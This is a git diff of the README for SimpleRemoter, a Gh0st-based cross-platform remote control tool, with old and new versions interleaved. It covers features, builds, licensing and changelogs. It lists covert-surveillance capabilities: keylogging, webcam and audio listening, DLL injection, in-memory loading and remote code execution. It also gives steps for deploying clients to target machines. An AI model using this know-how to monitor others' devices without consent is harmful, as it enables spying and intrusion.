- [Related Projects](#related-projects) - [Related Projects](#related-projects)
- [Contact](#contact) - [Contact](#contact)
@@ -55,62 +53,83 @@
## Overview ## Overview
**SimpleRemoter** is a full-featured remote control solution, rebuilt from the classic Gh0st framework using modern C++17. Started in 2019, it has evolved into an enterprise-grade remote management tool supporting **Windows, Linux, and macOS** platforms. **SimpleRemoter** is an end-to-end cross-platform remote control solution.
### Core Capabilities The project is built on the classic **Gh0st architecture** and was first started in January 2019. After 7 years of continuous iteration — from rebuilding the IOCP communication core, video-grade x264 encoding, the V2 file transfer protocol, the multi-layer authorization model, all the way to the introduction of Linux and macOS clients — this release finally completes **the full-platform loop for both client and server**: all three major desktop operating systems (Windows / Linux / macOS) can act as either the controlled side or the master side.
| Category | Features | **Original source:** [zibility/Remote](https://github.com/zibility/Remote) | **Started:** 2019.1.1
|----------|----------|
| **Remote Desktop** | Real-time screen control, multi-monitor support, H.264 encoding, adaptive quality |
| **File Management** | Bi-directional transfer, resumable uploads, C2C transfer, SHA-256 verification |
| **Terminal** | Interactive shell, ConPTY/PTY support, modern web terminal |
| **System Management** | Process/service/window management, registry browsing, session control |
| **Media Capture** | Webcam monitoring, audio listening, keylogging |
| **Networking** | SOCKS proxy, FRP tunneling, port forwarding |
### Use Cases
- **Enterprise IT Operations**: Batch management of intranet devices, remote troubleshooting
- **Remote Work**: Secure access to office computers, file synchronization
- **Security Research**: Penetration testing, red team exercises, security audits
- **Technical Learning**: Network programming, IOCP model, encrypted transmission practice
**Original Source:** [zibility/Remote](https://github.com/zibility/Remote) | **Started:** 2019.1.1
[![Star History Chart](https://api.star-history.com/svg?repos=yuanyuanxiang/SimpleRemoter&type=Date)](https://star-history.com/#yuanyuanxiang/SimpleRemoter&Date) [![Star History Chart](https://api.star-history.com/svg?repos=yuanyuanxiang/SimpleRemoter&type=Date)](https://star-history.com/#yuanyuanxiang/SimpleRemoter&Date)
--- ---
## Disclaimer ## What's New: Full-Platform Loop Closed
**Please read the following statement carefully before using this software:** The **C++ MFC master** (`YAMA.exe`) has been the project's core delivery form for years — classic Gh0st architecture, high-performance IOCP core, the complete remote desktop / file / process / media feature stack, multi-layer authorization, brand customization — and **remains the primary master to this day**. The MFC master also ships with a built-in WebSocket-based Web Remote Desktop service: since v1.3.1, **a browser on any platform** (phone / tablet / Linux / macOS desktop) can remote-control managed devices through it.
1. **Lawful Use**: This project is intended solely for legitimate technical research, educational exchange, and authorized remote management. It is strictly prohibited to use this software for unauthorized access to others' computer systems, data theft, privacy surveillance, or any other illegal activities. This release (v1.3.4) adds the last missing piece — the **Go master**: a **deliberately small, focused server** centered on *remote desktop + remote terminal + multi-user roles*, compiled and running across Windows / Linux / macOS. It is **not a replacement for the MFC master**. It exists for users who **cannot reasonably run a Windows VPS** and still want a native Linux / macOS landing point — for example pure Linux servers, always-on ARM Macs, or embedded master appliances.
2. **User Responsibility**: Users must comply with the laws and regulations of their country/region. Any legal liability arising from the use of this software shall be borne by the user. ### Which Master Should You Use
3. **No Warranty**: This software is provided "as is" without any express or implied warranties, including but not limited to warranties of merchantability or fitness for a particular purpose. | Form | GUI | Feature coverage | Platform | Role |
|---|---|---|---|---|
| **C++ MFC Master** (`YAMA.exe`) | Native Windows GUI + built-in Web service | ✅ **All features** | Windows | **Recommended.** Daily operations, file management, media capture, multi-layer licensing, branding — all of these go through MFC |
| **Go Master** (new) | Web UI (any browser) | Remote desktop + remote terminal + multi-user | Windows / Linux / macOS | **Supplementary.** For zero-Windows-dependency Linux / macOS master deployments |
4. **Limitation of Liability**: The developers shall not be liable for any direct, indirect, incidental, special, or consequential damages arising from the use, misuse, or inability to use this software. > [!TIP]
> Both masters **speak to the exact same client binaries** — you can mix and match: e.g. one Windows MFC master + one Linux Go master managing the same fleet of devices in parallel.
5. **Copyright Notice**: This project is open-sourced under the MIT License, allowing free use, modification, and distribution, provided that the original copyright notice is retained. ### Go Master Capabilities (v1.3.4)
**By continuing to use this software, you acknowledge that you have read, understood, and agreed to all the above terms.** - **Remote Desktop**: H.264 piped over WebSocket to the browser, hardware-decoded via WebCodecs, smooth 1080P @ 20fps
- **Remote Terminal**: xterm.js + ConPTY/PTY, with resize and Tab-completion support
- **Multi-user**: admin / regular user roles, Challenge-Response login, opaque tokens, per-device-group authorization
- **Production deployment**: Nginx reverse proxy + Let's Encrypt + Keyboard Lock + fullscreen handling that prevents accidental ESC / F11 exit
- **Intentionally minimal**: no file management, no media capture, no registry, no service management — those remain MFC-master features
### Full Platform Support Matrix
| | **Client (controlled)** | **Master** |
|---|---|---|
| **Windows** | ✅ All features | ✅ MFC `YAMA.exe` (recommended) / Go |
| **Linux** (X11) | ✅ Screen + terminal + files + clipboard | ✅ Go |
| **macOS** (Intel + Apple Silicon) | ✅ Screen + terminal + files + clipboard | ✅ Go |
---
## Compliance & Anti-Abuse
This project takes a deliberate "explicit compliance posture". This release tightens the anti-abuse boundary further.
### Built-in Technical Measures
Multiple independently verifiable anti-abuse barriers are constructed at the source-code level. See the [Anti-Abuse Technical Measures Inventory](./docs/Compliance_TechnicalMeasures.md) for the full catalog:
- **Inbound IP range check**: trial builds deployed to the public Internet trip a visible warning latch
- **Listening port cap**: trial builds are limited to ≤ 2 listening ports, blocking multi-tenant relay conversion
- **Application-layer RTT anti-proxy**: LAN-only RTT thresholds detect reverse proxies / tunnels
- **Multi-layer authorization**: V2 ECDSA offline + V1 online + trial — each tier has independent limits
- **Web master authentication**: enforced Challenge-Response login, login rate limiting, opaque tokens, auditable operations
### Compliance Documents
| Document | Content |
|---|---|
| 📖 [Anti-Abuse & Compliance Policy](./docs/Compliance_AntiAbuse.md) | Full publisher / user responsibility allocation |
| 📖 [Anti-Abuse Technical Measures Inventory](./docs/Compliance_TechnicalMeasures.md) | Source-code location, design motivation, known limitations of each barrier |
> [!IMPORTANT] > [!IMPORTANT]
> **Network Connection & Privacy Notice** > **Using this software constitutes acknowledgment that you have read, understood, and accepted all terms in the above compliance documents.** If you do not or cannot accept any term, stop using the software immediately and destroy all copies in your possession.
>
> The master program (server) communicates with the authorization server based on license status: ### Network & Privacy
>
> | License Type | Connection Behavior | | License type | Connection behavior |
> |--------------|---------------------| |---|---|
> | Trial Version | Maintains persistent connection to authorization server | | Trial | Maintains a persistent connection to the authorization server |
> | V1/V2 Licensed | Connects at startup for verification, disconnects after | | V1 / V2 licensed | Connects at startup for verification, disconnects after |
> | V2 Offline License | No connection to authorization server required | | V2 offline license | No connection to the authorization server required |
>
> Unless offline authorization is obtained, the master program will exchange necessary data with the authorization server (e.g., detecting cracking attempts, validating license status). Unless an offline license has been obtained, the master program exchanges necessary data with the authorization server (e.g. detecting cracking attempts, validating license status).
>
> **By using this software, you accept the data transmission between the master program and the authorization server. If you do not agree, please do not use this software.**
--- ---
@@ -120,568 +139,342 @@
![Remote Desktop](./images/Remote.jpg) ![Remote Desktop](./images/Remote.jpg)
- **Multiple Capture Methods**: GDI (high compatibility), DXGI (high performance), Virtual Desktop (background operation) - **Multiple screen capture backends**: GDI / DXGI / virtual desktop (Windows), X11 + XShm (Linux), CGDisplayStream (macOS)
- **Smart Compression Algorithms**: - **Smart compression**: DIFF (SSE2-optimized) / RGB565 (50% bandwidth savings) / **H.264** (video-grade, via x264 + VideoToolbox + WebCodecs) / grayscale mode
- DIFF algorithm - SSE2 optimized, transmits only changed regions - **Adaptive quality**: framerate (530 FPS), resolution, and compression algorithm adjusted automatically based on RTT
- RGB565 algorithm - 50% bandwidth savings - **Multi-monitor**: monitor switching + multi-monitor wall display
- H.264 encoding - Video-level compression for high frame rate scenarios - **Cross-device file drag-and-drop**: copy/paste files across devices with Ctrl+C / Ctrl+V
- Grayscale mode - Minimal bandwidth consumption - **Web Remote Desktop**: browser-based access, mobile-ready ([config guide](./docs/WebHTTPS.md))
- **Adaptive Quality**: Automatically adjusts frame rate (5-30 FPS), resolution, and compression based on network RTT
- **Multi-Monitor**: Support for screen switching and multi-screen wall display ![Web Remote Desktop](./images/WebRemote.png)
- **Privacy Screen**: Hide controlled screen, supports control during lock screen
- **File Drag & Drop**: Ctrl+C/V cross-device copy and paste files
- **Web Remote Desktop**: Access remote desktop via browser, supports mobile/tablet ([Configuration Guide](./docs/WebHTTPS.md))
### File Management ### File Management
![File Management](./images/FileManage.jpg) ![File Management](./images/FileManage.jpg)
- **V2 Transfer Protocol**: Newly designed, supports large files (>4GB) - **V2 transfer protocol**: large files (>4 GB), resumable transfers, SHA-256 verification
- **Resumable Transfer**: Automatic recovery after network interruption, persistent state - **C2C transfer**: client-to-client direct transfer without going through the master
- **C2C Transfer**: Direct transfer between clients without going through master - **Bulk operations**: search, compress, batch transfer
- **Integrity Verification**: SHA-256 hash verification ensures file integrity
- **Batch Operations**: Supports file search, compression, batch transfer
### Terminal Management ### Terminal
![Terminal](./images/Console.jpg) ![Console Management](./images/LinuxClient.png)
- **Interactive Shell**: Full command line experience with Tab completion - **Interactive shell**: Tab completion, ANSI escape sequences, resizable
- **ConPTY Technology**: Native pseudo-terminal support for Windows 10+ - **Modern terminals**: ConPTY on Windows, PTY on Linux / macOS
- **Modern Web Terminal**: Based on WebView2 + xterm.js (v1.2.7+) - **Web terminal**: xterm.js + WebSocket, parity with the native experience
- **Terminal Resizing**: Adaptive window size
### Process & Window Management
| Process Management | Window Management |
|-------------------|-------------------|
| ![Process](./images/Process.jpg) | ![Window](./images/Window.jpg) |
- **Process Management**: View process list, CPU/memory usage, start/terminate processes
- **Code Injection**: Inject DLL into target process (requires admin privileges)
- **Window Control**: Maximize/minimize/hide/close windows
### Media Features
| Video Management | Audio Management |
|-----------------|------------------|
| ![Video](./images/Video.jpg) | ![Audio](./images/Voice.jpg) |
- **Webcam Monitoring**: Real-time video stream, adjustable resolution
- **Audio Listening**: Remote sound capture, bi-directional voice support
- **Keylogging**: Online/offline recording modes
### Other Features ### Other Features
- **Service Management**: View and control Windows services | Module | Capability |
- **Registry Browsing**: Read-only browsing of registry contents |---|---|
- **Session Control**: Remote logout/shutdown/restart | **Process management** | Process list, CPU / memory usage, kill, DLL injection |
- **SOCKS Proxy**: Establish proxy tunnel through client | **Window management** | Maximize / minimize / hide / close |
- **FRP Tunneling**: Built-in FRP support for easy intranet penetration | **Media capture** | Webcam, two-way voice, keylogger |
- **Code Execution**: Remote DLL execution with hot update support | **System control** | Service management, registry, session logoff / shutdown |
| **Networking** | SOCKS proxy, FRP tunneling, port forwarding |
| **Code execution** | Remote DLL execution, in-memory loading, hot update |
--- ---
## Technical Highlights ## Cross-Platform Support
### High-Performance Network Architecture ### Windows Client
``` **Requirements**: Windows 7 SP1 or later
┌─────────────────────────────────────────────────────────┐ **Feature completeness**: ✅ All features supported
│ IOCP Communication Model │
├─────────────────────────────────────────────────────────┤
│ • I/O Completion Ports: Most efficient async I/O on │
│ Windows │
│ • Single master supports 10,000+ concurrent connections │
│ • Supports TCP / UDP / KCP transport protocols │
│ • Auto-chunking for large packets (max 128KB send buf) │
└─────────────────────────────────────────────────────────┘
```
### Adaptive Quality Control ### Linux Client (v1.2.5+)
Intelligent quality adjustment system based on RTT (Round-Trip Time): **Requirements**:
- Display server: X11/Xorg (Wayland not yet supported)
- Required: libX11. Recommended: libXtst (XTest extension), libXss (idle detection)
| RTT Latency | Quality Level | FPS | Resolution | Compression | Use Case | | Feature | Status | Implementation |
|-------------|---------------|-----|------------|-------------|----------| |---|---|---|
| < 30ms | Ultra | 25 FPS | Original | DIFF | LAN office | | Remote desktop | ✅ | X11 capture + libx264 H.264 hardware encoding |
| 30-80ms | High | 20 FPS | Original | RGB565 | General office | | Remote terminal | ✅ | PTY interactive shell |
| 80-150ms | Good | 20 FPS | ≤1080p | H.264 | Cross-network/Video | | File management | ✅ | V2 protocol, bidirectional, large files |
| 150-250ms | Medium | 15 FPS | ≤900p | H.264 | Cross-network office | | Process management | ✅ | List + kill |
| 250-400ms | Low | 12 FPS | ≤720p | H.264 | Poor network | | Clipboard sync | ✅ | xclip / xsel external tools, supports file URIs |
| > 400ms | Minimal | 8 FPS | ≤540p | H.264 | Very poor network | | Heartbeat / RTT | ✅ | RFC 6298 RTT estimation |
| Daemon mode | ✅ | Double-fork daemonization |
- **Zero Overhead**: Reuses heartbeat packets to calculate RTT **Build**: `cd linux && cmake . && make`
- **Fast Downgrade**: Triggers after 2 detections, responds to network fluctuations
- **Cautious Upgrade**: Quality improves only after 5 stable readings
- **Cooldown Mechanism**: Prevents frequent switching
### V2 File Transfer Protocol ### macOS Client (v1.3.2+)
```cpp **Requirements**:
// 77-byte protocol header + filename + data payload - macOS 10.15 (Catalina) or later
struct FileChunkPacketV2 { - Architecture: Intel (x64) and Apple Silicon (arm64) universal binary
uint8_t cmd; // COMMAND_SEND_FILE_V2 = 85 - Permissions: Screen Recording, Accessibility, Full Disk Access
uint64_t transferID; // Transfer session ID
uint64_t srcClientID; // Source client ID (0=master)
uint64_t dstClientID; // Destination client ID (0=master, C2C)
uint32_t fileIndex; // File index (0-based)
uint32_t totalFiles; // Total file count
uint64_t fileSize; // File size (supports >4GB)
uint64_t offset; // Current chunk offset
uint64_t dataLength; // Current chunk data length
uint64_t nameLength; // Filename length
uint16_t flags; // Flags (FFV2_LAST_CHUNK, etc.)
uint16_t checksum; // CRC16 checksum (optional)
uint8_t reserved[8]; // Reserved for extension
// char filename[nameLength]; // UTF-8 relative path
// uint8_t data[dataLength]; // File data
};
```
**Features**: | Feature | Status | Implementation |
- Large file support (uint64_t breaks 4GB limit) |---|---|---|
- Resumable transfer (state persisted to `%TEMP%\FileTransfer\`) | Remote desktop | ✅ | CGDisplayStream + VideoToolbox H.264 hardware encoding |
- SHA-256 integrity verification | Mouse / keyboard | ✅ | CGEvent, supports double-click and drag |
- C2C direct transfer (client to client) | Remote terminal | ✅ | PTY interactive shell (zsh/bash) |
- V1/V2 protocol compatibility | File management | ✅ | V2 protocol, large files |
| Process management | ✅ | proc_listpids + kill |
| Clipboard sync | ✅ | NSPasteboard, file URLs + NSFilenamesPboardType |
| Daemon mode | ✅ | `-d` background mode, power management, idle detection |
### Screen Transmission Optimization **Build**: `cd macos && ./build.sh`
- **SSE2 Instructions**: Hardware-accelerated pixel difference calculation ### Go Master (v1.3.4+)
- **Multi-threaded Parallel**: Thread pool for chunked screen data processing
- **Scroll Detection**: Identifies scrolling scenarios, reduces bandwidth by 50-80%
- **H.264 Encoding**: Based on x264, GOP control, video-level compression
### Security Mechanisms **Requirements**: Go 1.21+ (build time only); binary runs without dependencies
| Layer | Measures | | Capability | Implementation |
|-------|----------| |---|---|
| **Transport Encryption** | AES-256 data encryption with configurable IV | | Remote desktop | H.264 → WebSocket → WebCodecs, 1080P @ 20fps |
| **Authentication** | Signature verification + HMAC authentication | | Remote terminal | xterm.js + PTY/ConPTY transparent forwarding |
| **Authorization Control** | Serial number binding (IP/domain), multi-level authorization | | Multi-user | Challenge-Response + opaque token + per-group authorization |
| **File Verification** | SHA-256 integrity verification | | Deployment | Nginx reverse proxy / Let's Encrypt / systemd unit / `/etc/environment` |
| **Session Isolation** | Session 0 independent handling |
### Dependencies **Build**: `cd server/go && go build -o server_linux_amd64 ./cmd`
| Library | Version | Purpose |
|---------|---------|---------|
| zlib | 1.3.1 | General compression |
| zstd | 1.5.7 | High-speed compression |
| x264 | 0.164 | H.264 encoding |
| libyuv | 190 | YUV conversion |
| HPSocket | 6.0.3 | Network I/O |
| jsoncpp | 1.9.6 | JSON parsing |
--- ---
## Architecture ## Architecture
### Cross-Platform Topology
``` ```
┌───────────────────────────────────────────────────────────────────────────── ┌────────────────────────────────────────────────────────┐
│ Multi-Layer Authorization Architecture │ Master Layer
├─────────────────────────────────────────────────────────────────────────────┤ │ │
┌──────────────────┐ ┌──────────────────┐
┌─────────────────────┐ C++ MFC Master Go Master │
Super Admin │ YAMA.exe (Win/Linux/Mac) │
│ (Authorization │ Windows only Web UI, all OS
│ Server) │ └────────┬─────────┘ └────────┬─────────┘
│ └─────────┬───────────┘ │ └────────────┼──────────────────────────┼─────────────────┘
│ │
│ ┌──────────────┼──────────────┐ │ │ TCP (custom binary proto)│ TCP (devices) + WS (browsers)
│ V2 License │ V2 License │ V2 License │ └────────┬─────────────────┘
│ (ECDSA) │ (ECDSA) │ (ECDSA)
▼ ▼ ▼ │ ┌──────────────┼──────────────┐
┌───────────┐ ┌───────────┐ ┌───────────┐
│ Layer-1 A │ │ Layer-1 B │ │ Layer-1 C │ ◄── Independent │ ┌─────────┐ ┌─────────┐ ┌─────────┐
│ │ │ │ │ │ & Isolated │ Windows │ │ Linux macOS
└─────┬─────┘ └─────┬─────┘ └─────┬─────┘ │ client │ client │ client
│ │ │ │ │ (DXGI) (X11) │ │ (CG)
│ ┌────────┴────────┐ │ ┌──────┴──────┐ │ └─────────┘ └─────────┘ └─────────┘
│ │ V1 License │ │ │ V1 License │ │
│ ▼ ▼ ▼ ▼ ▼ │
│ ┌──────────┐ ┌──────────┐ ... ┌──────────┐ ┌──────────┐ │
│ │ Sub A1 │ │ Sub A2 │ │ Sub C1 │ │ Sub C2 │ │
│ │ Master │ │ Master │ │ Master │ │ Master │ │
│ └────┬─────┘ └────┬─────┘ └────┬─────┘ └────┬─────┘ │
│ │ │ │ │ │
│ ▼ ▼ ▼ ▼ │
│ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ │
│ │ Clients │ │ Clients │ │ Clients │ │ Clients │ │
│ │ 10,000+ │ │ 10,000+ │ │ 10,000+ │ │ 10,000+ │ │
│ └─────────┘ └─────────┘ └─────────┘ └─────────┘ │
│ │
├─────────────────────────────────────────────────────────────────────────────┤
│ License Type Verification Features │
│ ───────────────────────────────────────────────────────────────────────── │
│ V2 License ECDSA P-256 Signature Offline verify, connection limits │
│ V1 License HMAC + Online Verify Connects to upstream server │
│ Trial Online Verify Limited features, always connected │
└─────────────────────────────────────────────────────────────────────────────┘
``` ```
### Architecture Advantages ### Multi-Layer Authorization (simplified view)
| Feature | Description | ```
|---------|-------------| Super Admin (authorization server)
| **Hierarchical Control** | Super user manages any master, supports unlimited tiers | │ V2 license (ECDSA P-256)
| **Complete Isolation** | Different Layer-1 users have isolated licenses, data, and clients |
| **Independent Operation** | Layer-1 users can set pricing, issue licenses, build their brand | Layer-1 Master ──┬── Layer-1 Master ──┬── Layer-1 Master ◄── independent / fully isolated
| **Horizontal Scaling** | Single master supports 10,000+ clients, multi-layer scales to millions | │ V1 │ V1 │ V1
| **Offline Support** | V2 license supports full offline verification, no upstream dependency | ▼ ▼ ▼
Sub-master → Clients (10,000+) → Device fleet
```
### Master Program (Server) | License | Verification | Notes |
|---|---|---|
| V2 license | ECDSA P-256 signature | Offline verification, sub-master connection cap |
| V1 license | HMAC + online check | Connects to upstream for verification |
| Trial | Online check | Feature- and connection-limited (see [compliance docs](./docs/Compliance_AntiAbuse.md)) |
The master program **YAMA.exe** provides a graphical management interface: Full description: [Multi-Layer License](./docs/MultiLayerLicense.md)
![Main Interface](./images/Yama.jpg)
- High-performance server based on IOCP
- Client group management
- Real-time status monitoring (RTT, geolocation, active window)
- One-click client generation
### Controlled Program (Client)
![Client Generation](./images/TestRun.jpg)
**Runtime Forms**:
| Type | Description |
|------|-------------|
| `ghost.exe` | Standalone executable, no external dependencies |
| `TestRun.exe` + `ServerDll.dll` | Separate loading, supports in-memory DLL loading |
| Windows Service | Background operation, supports lock screen control |
| Linux Client | Cross-platform support (v1.2.5+) |
| macOS Client | Cross-platform support (v1.3.2+) |
--- ---
## Getting Started ## Getting Started
### 5-Minute Quick Start ### 5-Minute Walkthrough
No compilation required, download and run: No compilation required download and run:
1. **Download Release** - Get the latest version from [Releases](https://github.com/yuanyuanxiang/SimpleRemoter/releases/latest) 1. **Download a release** — grab the latest build from [Releases](https://git.simpleremoter.com/yuanyuanxiang/SimpleRemoter/releases/latest)
2. **Launch Master** - Run `YAMA.exe` and enter the license info (see trial license below) 2. **Start the master** — run `YAMA.exe` (or `server_linux_amd64` on Linux), enter the license info
3. **Generate Client** - Click the "Generate" button in the toolbar, configure server IP and port 3. **Generate a client** — click *Build* in the toolbar, configure server IP / port
4. **Deploy Client** - Copy the generated client to the target machine and run it 4. **Deploy the client** — copy to the target machine and run it
5. **Start Control** - Once the client comes online, double-click to open remote desktop 5. **Take control** — once the client is online, double-click to open the remote desktop
> [!TIP] > [!TIP]
> For initial testing, run both master and client on the same machine using `127.0.0.1` as the server address. > For the first test, run both the master and the client on the same machine using `127.0.0.1` as the server address.
### Build Requirements ### Go Master Deployment (VPS)
- **Operating System**: Windows 10/11 or Windows Server 2016+ See the [Web Remote Desktop config](./docs/WebHTTPS.md). The minimum recipe:
- **Development Environment**: Visual Studio 2019 / 2022 / 2026
- **SDK**: Windows 10 SDK (10.0.19041.0+)
### Build Steps
```bash ```bash
# 1. Clone the repository (must use git clone, do not download as zip) # 1. Run the Go master on the VPS
git clone https://github.com/yuanyuanxiang/SimpleRemoter.git nohup ./server_linux_amd64 --port 6543 --http-port 9001 > yama.log 2>&1 &
# 2. Open the solution # 2. nginx reverse proxy: 9001 → HTTPS
# Open SimpleRemoter.sln with VS2019+ # See docs/WebHTTPS.md
# 3. Select configuration # 3. Open https://yourdomain.com/ in a browser, log in, add clients
# Release | x86 or Release | x64
# 4. Build
# Build -> Build Solution
``` ```
**Common Issues**: ### Trial License (v1.2.4+)
- Dependency library conflicts: [#269](https://github.com/yuanyuanxiang/SimpleRemoter/issues/269)
- Non-Chinese system garbled text: [#157](https://github.com/yuanyuanxiang/SimpleRemoter/issues/157)
- Compiler compatibility: [#171](https://github.com/yuanyuanxiang/SimpleRemoter/issues/171)
### Deployment Methods A trial credential is provided — 2-year validity, 20 concurrent connections, LAN-only:
#### Intranet Deployment
Master and clients are on the same LAN, clients connect directly to master IP:Port.
#### Internet Deployment (FRP Tunneling)
``` ```
Client ──> VPS (FRP Server) ──> Local Master (FRP Client) Master IP : 127.0.0.1
``` Serial : 12ca-17b4-9af2-2894
Password : 20260201-20280201-0020-be94-120d-20f9-919a
For detailed configuration, please refer to: [Reverse Proxy Deployment Guide](./反向代理.md) Token : 6015188620429852704
Valid : 2026-02-01 to 2028-02-01
### Authorization
Starting from v1.2.4, a trial password is provided (2-year validity, 20 concurrent connections, intranet only):
```
Authorization: Bound by computer IP
Master IP: 127.0.0.1
Serial: 12ca-17b4-9af2-2894
Password: 20260201-20280201-0020-be94-120d-20f9-919a
Verification: 6015188620429852704
Valid: 2026-02-01 to 2028-02-01
``` ```
> [!NOTE] > [!NOTE]
> **Multi-Layer Licensing** > **Multi-Layer Licensing**
> >
> SimpleRemoter uses an enterprise-grade multi-layer authorization architecture, supporting independent operation for agents/developers: > Supports independent operation by resellers / developers: Layer-1 users can operate fully offline once licensed, and their sub-users only connect to *your* server. Full description: [Multi-Layer License](./docs/MultiLayerLicense.md)
> - **Offline Verification**: First-layer users can operate completely offline after obtaining authorization
> - **Independent Control**: Your downstream users connect only to your server, with data fully under your control ### Build
> - **Free Customization**: Supports secondary development to create your own branded version
> - **C++ master & Windows client**: open `SimpleRemoter.sln` in VS 2019 / 2022 / 2026 → Release | x64
> 📖 **[View Full Licensing Documentation](./docs/MultiLayerLicense.md)** - **Linux client**: `cd linux && cmake . && make`
- **macOS client**: `cd macos && ./build.sh`
- **Go master**: `cd server/go && go build ./cmd`
--- ---
## Client Support ## User Documentation
### Windows Client | Document | Audience | Content |
|---|---|---|
**System Requirements**: Windows 7 SP1 and above | 📖 [Quick Start Guide](./docs/QuickStart.md) | First-time users | First-time deployment in 10 minutes |
| 📖 [Multi-Tier Network Setup](./docs/NetworkSetup.md) | Users managing sub-tiers | Multi-tier network architecture |
**Feature Completeness**: ✅ All features supported | 📖 [User Manual](./docs/UserManual.md) | All users | Complete feature walkthrough |
| 📖 [Reseller Operations Manual](./docs/AgentManual.md) | Resellers / distributors | Sub-licensing, FRP setup |
### Linux Client (v1.2.5+) | 📖 [Customization Guide](./docs/CustomizationGuide.md) | Technical customers | Branding, secondary development |
| 📖 [Web Remote Desktop Setup](./docs/WebHTTPS.md) | Mobile / Go-master users | HTTPS reverse proxy, domain config |
**System Requirements**: | 📖 [Anti-Abuse Policy](./docs/Compliance_AntiAbuse.md) | All users | Compliance boundaries, responsibility allocation |
- Display Server: X11/Xorg (Wayland not yet supported) | 📖 [Anti-Abuse Technical Measures](./docs/Compliance_TechnicalMeasures.md) | Compliance auditors | Source-code location and motivation for each barrier |
- Required: libX11
- Recommended: libXtst (XTest extension), libXss (idle detection)
**Feature Support**:
| Feature | Status | Implementation |
|---------|--------|----------------|
| Remote Desktop | ✅ | X11 screen capture, mouse/keyboard control |
| Remote Terminal | ✅ | PTY interactive shell |
| File Management | ✅ | Bi-directional transfer, large file support |
| Process Management | ✅ | Process list, terminate processes |
| Heartbeat/RTT | ✅ | RFC 6298 RTT estimation |
| Daemon Process | ✅ | Double fork daemonization |
| Clipboard | ⏳ | In development |
| Session Management | ⏳ | In development |
**Build Instructions**:
```bash
cd linux
cmake .
make
```
### macOS Client (v1.3.2+)
**System Requirements**:
- macOS 10.15 (Catalina) or later
- Required permissions: Screen Recording, Accessibility, Full Disk Access
**Feature Support**:
| Feature | Status | Implementation |
|---------|--------|----------------|
| Remote Desktop | ✅ | CoreGraphics screen capture, H.264 hardware encoding |
| Mouse Control | ✅ | CGEvent simulation, supports double-click, drag |
| Keyboard Control | ✅ | CGEvent simulation, full keycode mapping |
| Cursor Sync | ✅ | Real-time remote cursor style synchronization |
| Heartbeat/RTT | ✅ | RFC 6298 RTT estimation |
| File Management | ⏳ | In development |
| Remote Terminal | ⏳ | In development |
**Build Instructions**:
```bash
cd macos
mkdir build && cd build
cmake ..
make
```
--- ---
## Changelog ## Changelog
### v1.3.2 (2026.5.1) ### v1.3.5 (2026.5.31)
**macOS Client & Web Remote Desktop Enhancement** **Hardware encoding expansion (H.264 / AV1) & multi-tenant license hardening & FRP sub-master automation**
**New Features:** **New features:**
- macOS client support: Native macOS client with screen capture, H.264 encoding, keyboard/mouse control, system permission management - **Client hardware encoding**: new `CFFmpegH264Encoder` / `CFFmpegAV1Encoder` on the FFmpeg path, driving NVENC / Quick Sync / AMF GPU encoders; `EncoderFactory` picks the best available encoder at runtime
- Web remote desktop cursor sync: Real-time display of remote host cursor style in browser - **Skip-encode on identical frames**: capture layer compares consecutive frames and skips both encode and transmit when the picture is static — hardware encoders no longer get fed duplicate frames during idle desktops
- Trigger functionality: Support custom actions triggered by host online events - **Menu-driven compress / extract**: custom file + folder picker (`ZstaPickerDlg`) lets you select a mixed directory tree on the remote host to zip up, or extract an archive to a target path
- User management: Role-based permission management, multi-user hierarchical control - **Auto-launch frp client for sub-masters**: when upstream issues a V2 license, frp config is shipped alongside it; the sub-master connects to the relay automatically with no manual `frpc.toml`
- DLL execution enhancements: Parameter persistence, auto-run configuration support - **Compliance-tailorable build**: `DISABLE_X264` / `DISABLE_FFMPEG` build flags produce binaries with zero x264 / FFmpeg dependency without touching source; paired with `LICENSE-THIRD-PARTY.txt`
- Remote desktop input language switching: Support switching remote host input language
**Improvements:** **Improvements:**
- Web remote desktop gesture optimization: Improved two-finger gesture recognition, double-tap drag, Shift key combination support - **Multi-tenant license server hardening**: `licenses.ini` hot path now has a recursive mutex + 30s throttle; write rate dropped from 0.6 → 0.07/sec (extrapolated to 100 online targets: ~160 → ~3.3 writes/sec). Closes the read-modify-write race that caused "preset renewal quota silently disappears"
- **`licenses.ini` IP list 4KB truncation fix**: segmented writes prevent the tail of large IP histories from being silently dropped by `WritePrivateProfileString`'s 4KB single-value cap
- **`BindType` enforced on SN import**: offline / online / trial SNs can no longer be cross-imported into the wrong bucket
- **Client SCLoader slim-down**: removed `SCLoader.cpp` (10K lines of hard-coded stub); the client now uses the DLL delivered by the master at runtime
- **Client logger graceful shutdown**: drains queued log lines on exit and records the exit signal — after a restart you still have the last 1-2 seconds of context
- **IOCPClient early-packet guard**: packets that arrive before `setManagerCallBack` no longer trigger a null-callback crash (startup race)
- **Multi-monitor trace-cursor position fix & MJPEG playback flip fix**: trace cursor coordinates corrected for cross-monitor capture; MJPEG upside-down playback fixed and 0-byte AVI residue removed on encoder-open failure
- **FRP `privilegeKey` switched to UTC**: master / relay / client across different time zones no longer reject each other's frp auth because of local-time skew
- **Linux client `install.sh` / `uninstall.sh`**: one-shot install / uninstall scripts, on par with macOS
- **Go server build pipeline**: `build.ps1` / `build.cmd` now build the Go master as part of the main build
- **Release / Download links migrated to Gitea**: v1.3.4+ is no longer published to GitHub
**Bug Fixes:** **Bug fixes:**
- Fixed Web remote desktop double-click not working for macOS clients - Web file manager touch double-click unreliability: move threshold widened to avoid spurious drag detection, plus two sequential `click` events (20ms apart) instead of the non-standard `dblclick` — fixes folder rename / unresponsive clicks on Windows, Linux, and macOS
- Fixed macOS Full Disk Access permission detection inaccuracy - AUTH packet to sub-master used the wrong password generation path, causing sub-masters to fail authentication every time
- Fixed RestoreMemDLL failure due to incorrect DLL info size - Trial SN was being routed through the V2 / V1 license-issue branch
- Fixed multiple DLLs execution failure due to global variable conflict
- Fixed mouse double-click and remote desktop switching issues ### v1.3.4 (2026.5.20)
- Fixed Linux client build missing libzstd.a
**Go master & full-platform master loop & Linux/macOS clipboard**
**New features:**
- **Go master**: cross-platform lightweight master service in Go (Windows / Linux / macOS), focused on *remote desktop + remote terminal + multi-user roles* — does not replace the MFC master, fills the gap for pure Linux/macOS deployments
- **Web remote desktop (Go master)**: H.264 → WebSocket → WebCodecs decode, 1080P @ 20fps, desktop + mobile; remote cursor sync, Keyboard Lock to prevent accidental ESC/F11 exit, F11/Esc passed through to the remote when in control mode
- **Web remote terminal (Go master)**: xterm.js + PTY/ConPTY transparent forwarding, resize, automatic terminal panel cleanup on disconnect
